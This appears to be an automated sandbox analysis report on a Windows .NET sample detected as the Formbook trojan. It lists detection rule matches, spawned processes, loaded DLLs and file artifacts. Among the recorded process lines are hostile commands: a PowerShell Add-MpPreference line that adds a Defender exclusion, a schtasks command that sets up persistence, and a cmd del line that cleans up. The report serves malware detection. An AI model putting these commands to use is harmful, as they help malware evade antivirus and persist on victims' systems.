Source: Process Memory Space: explorer.exe PID: 7452, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmstp.exe PID: 7588, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 890983726372673.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: mZanCtInfW.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, o5MkqEYU7pCb57Wa7i.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, o5MkqEYU7pCb57Wa7i.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.890983726372673.exe.74e0000.3.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, o5MkqEYU7pCb57Wa7i.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, o5MkqEYU7pCb57Wa7i.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.890983726372673.exe.469e708.1.raw.unpack, D0NkvxLjdr8MmKuuaX.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.evad.winEXE@281/11@6/4

Source: C:\Users\user\Desktop\890983726372673.exe

File created: C:\Users\user\AppData\Roaming\mZanCtInfW.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2516:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5196:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Mutant created: \Sessions\1\BaseNamedObjects\ZJCGokzYhCbSlTt
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03

Source: C:\Users\user\Desktop\890983726372673.exe

File created: C:\Users\user\AppData\Local\Temp\tmpB44A.tmp

Jump to behavior

Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe			Jump to behavior

Source: 890983726372673.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 890983726372673.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\890983726372673.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\890983726372673.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 890983726372673.exe	Virustotal: Detection: 65%
Source: 890983726372673.exe	ReversingLabs: Detection: 55%

Source: explorer.exe	String found in binary or memory: /LOADSAVEDWINDOWS
Source: explorer.exe	String found in binary or memory: accent-startColorMenu
Source: explorer.exe	String found in binary or memory: accent-startColor
Source: explorer.exe	String found in binary or memory: themes-installTheme
Source: explorer.exe	String found in binary or memory: Microsoft-Windows-Shell-Launcher
Source: explorer.exe	String found in binary or memory: api-ms-win-stateseparation-helpers-l1-1-0.dll

Source: C:\Users\user\Desktop\890983726372673.exe

File read: C:\Users\user\Desktop\890983726372673.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\890983726372673.exe "C:\Users\user\Desktop\890983726372673.exe"
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown	Process created: C:\Users\user\AppData\Roaming\mZanCtInfW.exe C:\Users\user\AppData\Roaming\mZanCtInfW.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpCC47.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\mZanCtInfW.exe"	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpB44A.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\explorer.exe "C:\Windows\SysWOW64\explorer.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mZanCtInfW" /XML "C:\Users\user\AppData\Local\Temp\tmpCC47.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\890983726372673.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: cmutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\890983726372673.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\890983726372673.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 890983726372673.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 890983726372673.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: 890983726372673.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: explorer.pdbUGP source: RegSvcs.exe, 00000009.00000002.1386926023.0000000003580000.00000040.10000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2542142612.00000000009E0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmstp.pdbGCTL source: RegSvcs.exe, 00000010.00000002.1414949296.0000000001900000.00000040.10000000.00040000.00000000.sdmp, RegSvcs.exe, 00000010.00000002.1413925702.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000011.00000002.1416845022.0000000000440000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: mxDW.pdb source: 890983726372673.exe, mZanCtInfW.exe.1.dr
Source:	Binary string: RegSvcs.pdb, source: explorer.exe, 0000000A.00000002.2563131962.00000000110FF000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 0000000D.00000002.2545155032.000000000355A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2547041429.000000000594F000.00000004.10000000.00040000.00000000.sdmp
